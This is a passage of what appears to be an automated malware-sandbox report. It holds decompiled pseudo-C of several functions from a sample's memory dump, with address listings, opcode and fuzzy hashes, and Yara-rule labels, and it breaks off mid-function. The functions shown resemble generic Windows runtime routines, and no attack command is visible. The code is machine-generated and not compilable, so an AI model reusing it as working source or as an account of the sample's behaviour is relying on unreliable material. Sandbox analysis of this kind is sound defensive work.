                                                                                                            0x0107f049
                                                                                                            0x0107f051
                                                                                                            0x0107f09e
                                                                                                            0x0107f0a0
                                                                                                            0x0107f0a0
                                                                                                            0x0107f09e
                                                                                                            0x0107f053
                                                                                                            0x0107f064
                                                                                                            0x0107f064
                                                                                                            0x0107f06b
                                                                                                            0x010cbb1a
                                                                                                            0x010cbb1a
                                                                                                            0x0107f071
                                                                                                            0x0107f071
                                                                                                            0x0107f07d
                                                                                                            0x0107f082
                                                                                                            0x0107f08f
                                                                                                            0x0107f08f
                                                                                                            0x0107f009
                                                                                                            0x0107f00d
                                                                                                            0x00000000
                                                                                                            0x0107f00d
                                                                                                            0x0107efd0
                                                                                                            0x0107ef97
                                                                                                            0x0107efa5
                                                                                                            0x0107efaa
                                                                                                            0x00000000
                                                                                                            0x0107efac
                                                                                                            0x0107efac
                                                                                                            0x0107efac
                                                                                                            0x00000000
                                                                                                            0x0107efb2
                                                                                                            0x0107f036
                                                                                                            0x0107f03a
                                                                                                            0x0107f040
                                                                                                            0x0107f090
                                                                                                            0x00000000
                                                                                                            0x0107f092
                                                                                                            0x0107f042
                                                                                                            0x00000000
                                                                                                            0x0107f042
                                                                                                            0x0107efb7
                                                                                                            0x0107efb9
                                                                                                            0x0107efbc
                                                                                                            0x0107efb0
                                                                                                            0x0107efb0
                                                                                                            0x00000000
                                                                                                            0x0107efbe
                                                                                                            0x0107efbe
                                                                                                            0x0107efc1
                                                                                                            0x00000000
                                                                                                            0x0107efc1
                                                                                                            0x0107efbc
                                                                                                            0x0107efaa
                                                                                                            0x0107ef91

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                            • Instruction ID: ae9cd1b15d4bdb553741a6dab2b1039634cd67e178afbb34fe9bd7f74ce08e04
                                                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                            • Instruction Fuzzy Hash: 6751F330E0524A9FEB62CB6CC0D07AEBBF1AF05314F1881E8E5E553382C375A989C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0113740D Relevance: .1, Instructions: 141COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E0113740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E010BD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E010AF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E010AF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                            0x0113740d
                                                                                                            0x0113740d
                                                                                                            0x01137412
                                                                                                            0x01137413
                                                                                                            0x01137416
                                                                                                            0x01137418
                                                                                                            0x0113741c
                                                                                                            0x0113741f
                                                                                                            0x01137422
                                                                                                            0x01137422
                                                                                                            0x01137428
                                                                                                            0x0113742a
                                                                                                            0x0113742a
                                                                                                            0x01137451
                                                                                                            0x01137432
                                                                                                            0x0113744f
                                                                                                            0x0113744f
                                                                                                            0x00000000
                                                                                                            0x01137434
                                                                                                            0x01137438
                                                                                                            0x01137443
                                                                                                            0x01137517
                                                                                                            0x01137517
                                                                                                            0x0113751a
                                                                                                            0x01137535
                                                                                                            0x01137520
                                                                                                            0x01137527
                                                                                                            0x0113752c
                                                                                                            0x01137531
                                                                                                            0x01137533
                                                                                                            0x00000000
                                                                                                            0x01137533
                                                                                                            0x00000000
                                                                                                            0x01137531
                                                                                                            0x0113754b
                                                                                                            0x0113754f
                                                                                                            0x0113755c
                                                                                                            0x0113755c
                                                                                                            0x0113755f
                                                                                                            0x01137560
                                                                                                            0x01137561
                                                                                                            0x01137562
                                                                                                            0x01137563
                                                                                                            0x01137568
                                                                                                            0x0113756a
                                                                                                            0x0113756c
                                                                                                            0x0113756d
                                                                                                            0x0113756d
                                                                                                            0x0113756f
                                                                                                            0x01137572
                                                                                                            0x01137574
                                                                                                            0x01137577
                                                                                                            0x0113757c
                                                                                                            0x0113757f
                                                                                                            0x00000000
                                                                                                            0x01137551
                                                                                                            0x01137551
                                                                                                            0x01137551
                                                                                                            0x01137553
                                                                                                            0x01137553
                                                                                                            0x01137449
                                                                                                            0x01137449
                                                                                                            0x0113744c
                                                                                                            0x0113744c
                                                                                                            0x00000000
                                                                                                            0x0113744c
                                                                                                            0x01137443
                                                                                                            0x0113750e
                                                                                                            0x01137514
                                                                                                            0x01137514
                                                                                                            0x01137455
                                                                                                            0x01137469
                                                                                                            0x0113746d
                                                                                                            0x00000000
                                                                                                            0x01137473
                                                                                                            0x01137473
                                                                                                            0x01137476
                                                                                                            0x01137480
                                                                                                            0x01137484
                                                                                                            0x0113748e
                                                                                                            0x01137493
                                                                                                            0x01137493
                                                                                                            0x01137496
                                                                                                            0x01137499
                                                                                                            0x011374a1
                                                                                                            0x011374b1
                                                                                                            0x011374b5
                                                                                                            0x00000000
                                                                                                            0x011374bb
                                                                                                            0x011374c1
                                                                                                            0x011374c1
                                                                                                            0x011374c4
                                                                                                            0x011374c5
                                                                                                            0x011374c6
                                                                                                            0x011374c7
                                                                                                            0x011374c8
                                                                                                            0x011374cd
                                                                                                            0x00000000
                                                                                                            0x011374d3
                                                                                                            0x011374d3
                                                                                                            0x011374d6
                                                                                                            0x011374d8
                                                                                                            0x011374db
                                                                                                            0x011374dd
                                                                                                            0x011374e0
                                                                                                            0x011374e7
                                                                                                            0x011374ee
                                                                                                            0x011374ee
                                                                                                            0x011374f4
                                                                                                            0x011374f9
                                                                                                            0x00000000
                                                                                                            0x011374fb
                                                                                                            0x011374fb
                                                                                                            0x011374fd
                                                                                                            0x01137500
                                                                                                            0x01137503
                                                                                                            0x01137505
                                                                                                            0x01137505
                                                                                                            0x011374f9
                                                                                                            0x00000000
                                                                                                            0x011374cd
                                                                                                            0x011374b5
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                            • Instruction ID: 8511924e089677b8aa340e42238175875c2b319697eaf4dfc54ee02a10c62987
                                                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                            • Instruction Fuzzy Hash: FF518FB1600646EFDB1ACF58D480A96BBF5FF85304F15C0AAE908DF296E371E945CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01092990 Relevance: .1, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E01092990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x113ff00);
				E010BD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1041664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E010AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1041668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E010E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x104166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01092AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01076600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01092C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01092AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01092C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01092ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E010BD0D1(_t62);
				goto L28;
			}





















                                                                                                            0x01092990
                                                                                                            0x01092992
                                                                                                            0x01092997
                                                                                                            0x010929a3
                                                                                                            0x010929a6
                                                                                                            0x010929ab
                                                                                                            0x010929ad
                                                                                                            0x010929b2
                                                                                                            0x010d5c80
                                                                                                            0x010929b8
                                                                                                            0x010929b8
                                                                                                            0x010929bb
                                                                                                            0x010929c0
                                                                                                            0x010929c5
                                                                                                            0x010929c6
                                                                                                            0x010929c6
                                                                                                            0x010929cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010929cd
                                                                                                            0x010929d0
                                                                                                            0x010929d9
                                                                                                            0x010929db
                                                                                                            0x010929dd
                                                                                                            0x01092a7f
                                                                                                            0x01092a84
                                                                                                            0x01092a87
                                                                                                            0x01092a89
                                                                                                            0x010d5ca1
                                                                                                            0x010d5ca3
                                                                                                            0x00000000
                                                                                                            0x01092a8f
                                                                                                            0x01092a8f
                                                                                                            0x00000000
                                                                                                            0x01092a8f
                                                                                                            0x00000000
                                                                                                            0x010929e3
                                                                                                            0x010929e3
                                                                                                            0x010929e3
                                                                                                            0x00000000
                                                                                                            0x010929e3
                                                                                                            0x010929dd
                                                                                                            0x00000000
                                                                                                            0x010929db
                                                                                                            0x010929e6
                                                                                                            0x010929e9
                                                                                                            0x010929eb
                                                                                                            0x010929ed
                                                                                                            0x010929f3
                                                                                                            0x010929f5
                                                                                                            0x010929f8
                                                                                                            0x010929fa
                                                                                                            0x01092a97
                                                                                                            0x01092a9a
                                                                                                            0x01092a9d
                                                                                                            0x01092add
                                                                                                            0x00000000
                                                                                                            0x01092a9f
                                                                                                            0x01092aa2
                                                                                                            0x01092aa5
                                                                                                            0x01092aa8
                                                                                                            0x01092aab
                                                                                                            0x010d5cab
                                                                                                            0x010d5caf
                                                                                                            0x010d5cc5
                                                                                                            0x010d5cda
                                                                                                            0x010d5cdc
                                                                                                            0x010d5cdf
                                                                                                            0x010d5ce5
                                                                                                            0x00000000
                                                                                                            0x010d5ceb
                                                                                                            0x010d5ced
                                                                                                            0x010d5cee
                                                                                                            0x00000000
                                                                                                            0x010d5cee
                                                                                                            0x010d5cb1
                                                                                                            0x010d5cb4
                                                                                                            0x010d5cb9
                                                                                                            0x010d5cbb
                                                                                                            0x00000000
                                                                                                            0x010d5cbd
                                                                                                            0x010d5cbd
                                                                                                            0x00000000
                                                                                                            0x010d5cbd
                                                                                                            0x010d5cbb
                                                                                                            0x01092ab1
                                                                                                            0x01092ab1
                                                                                                            0x01092ac4
                                                                                                            0x01092ac6
                                                                                                            0x01092ac6
                                                                                                            0x00000000
                                                                                                            0x01092ac6
                                                                                                            0x01092aab
                                                                                                            0x00000000
                                                                                                            0x01092a00
                                                                                                            0x01092a09
                                                                                                            0x01092a0e
                                                                                                            0x01092a21
                                                                                                            0x01092a24
                                                                                                            0x01092a35
                                                                                                            0x01092a3a
                                                                                                            0x01092a3d
                                                                                                            0x01092a42
                                                                                                            0x01092a59
                                                                                                            0x01092a59
                                                                                                            0x01092a5c
                                                                                                            0x01092a5f
                                                                                                            0x01092a5f
                                                                                                            0x010929fa
                                                                                                            0x010929f3
                                                                                                            0x01092a64
                                                                                                            0x01092a64
                                                                                                            0x01092a6b
                                                                                                            0x01092a6b
                                                                                                            0x01092a6d
                                                                                                            0x01092a72
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf46fd70f99b75f28967765cb880f3c129179257103d5a948fb76c61b7229488
                                                                                                            • Instruction ID: 8b1bd6a2953646fead0ed6b3e6b32ec9e8b9a4cc3f3ea61ea28eb7a3f7e9ecbd
                                                                                                            • Opcode Fuzzy Hash: cf46fd70f99b75f28967765cb880f3c129179257103d5a948fb76c61b7229488
                                                                                                            • Instruction Fuzzy Hash: 6B517B7290020AEFDF25DF99C890ADEBBB5BF58310F058155E984AB260C3359D92DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01094BAD Relevance: .1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E01094BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x115d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0106CC50(_t86);
					L11:
					return E010AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1158504
				E01082280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E010AFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E010AB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01084620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0106CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1158504
								E0107FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01094F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                            0x01094bad
                                                                                                            0x01094bbf
                                                                                                            0x01094bc2
                                                                                                            0x01094bc6
                                                                                                            0x01094bcd
                                                                                                            0x01094bd9
                                                                                                            0x010d67fe
                                                                                                            0x010d6800
                                                                                                            0x01094ccc
                                                                                                            0x01094ccd
                                                                                                            0x01094cb7
                                                                                                            0x01094cc9
                                                                                                            0x01094cc9
                                                                                                            0x01094bdf
                                                                                                            0x01094be5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01094beb
                                                                                                            0x01094bef
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01094bf5
                                                                                                            0x01094bf9
                                                                                                            0x01094c06
                                                                                                            0x01094c0b
                                                                                                            0x01094c17
                                                                                                            0x01094c1c
                                                                                                            0x01094c1f
                                                                                                            0x01094c25
                                                                                                            0x01094c33
                                                                                                            0x01094c3d
                                                                                                            0x01094c40
                                                                                                            0x01094c43
                                                                                                            0x01094c47
                                                                                                            0x01094c4d
                                                                                                            0x01094c53
                                                                                                            0x01094c54
                                                                                                            0x01094c55
                                                                                                            0x01094c56
                                                                                                            0x01094c5b
                                                                                                            0x01094c5c
                                                                                                            0x01094c63
                                                                                                            0x01094c6b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6776
                                                                                                            0x010d6784
                                                                                                            0x010d6784
                                                                                                            0x010d679f
                                                                                                            0x010d67a7
                                                                                                            0x010d67af
                                                                                                            0x010d67ce
                                                                                                            0x00000000
                                                                                                            0x010d67b1
                                                                                                            0x010d67b7
                                                                                                            0x010d67b8
                                                                                                            0x010d67c1
                                                                                                            0x010d67d3
                                                                                                            0x010d67d9
                                                                                                            0x010d67dd
                                                                                                            0x01094c94
                                                                                                            0x01094c94
                                                                                                            0x01094c98
                                                                                                            0x01094c9c
                                                                                                            0x01094ca3
                                                                                                            0x010d67f4
                                                                                                            0x010d67f4
                                                                                                            0x01094cb5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01094cb5
                                                                                                            0x01094c79
                                                                                                            0x01094c7e
                                                                                                            0x01094c89
                                                                                                            0x01094c8b
                                                                                                            0x01094c8f
                                                                                                            0x01094c8f
                                                                                                            0x00000000
                                                                                                            0x01094c89
                                                                                                            0x010d67c3
                                                                                                            0x00000000
                                                                                                            0x010d67c3
                                                                                                            0x010d67af
                                                                                                            0x01094c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a68d37c6b572bc87935c100063786d199055b66ef2a2358479cebfad58225c6
                                                                                                            • Instruction ID: b78de0a23f9e1af921f5a9d615aa5655ee6a1ff89e9f6e8d396b71ccbcc56aff
                                                                                                            • Opcode Fuzzy Hash: 9a68d37c6b572bc87935c100063786d199055b66ef2a2358479cebfad58225c6
                                                                                                            • Instruction Fuzzy Hash: 2F419E71A0026D9EDF61EF68CA40BEE77F4FF45710F0100A5E988AB241EA759E81CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01094D3B Relevance: .1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E01094D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x115d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E010AFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1157bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E010AB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01084620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0106CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E010AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E010AF380(_t67 + 0xc, 0x1045138, 0x10) == 0) {
								 *0x11560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
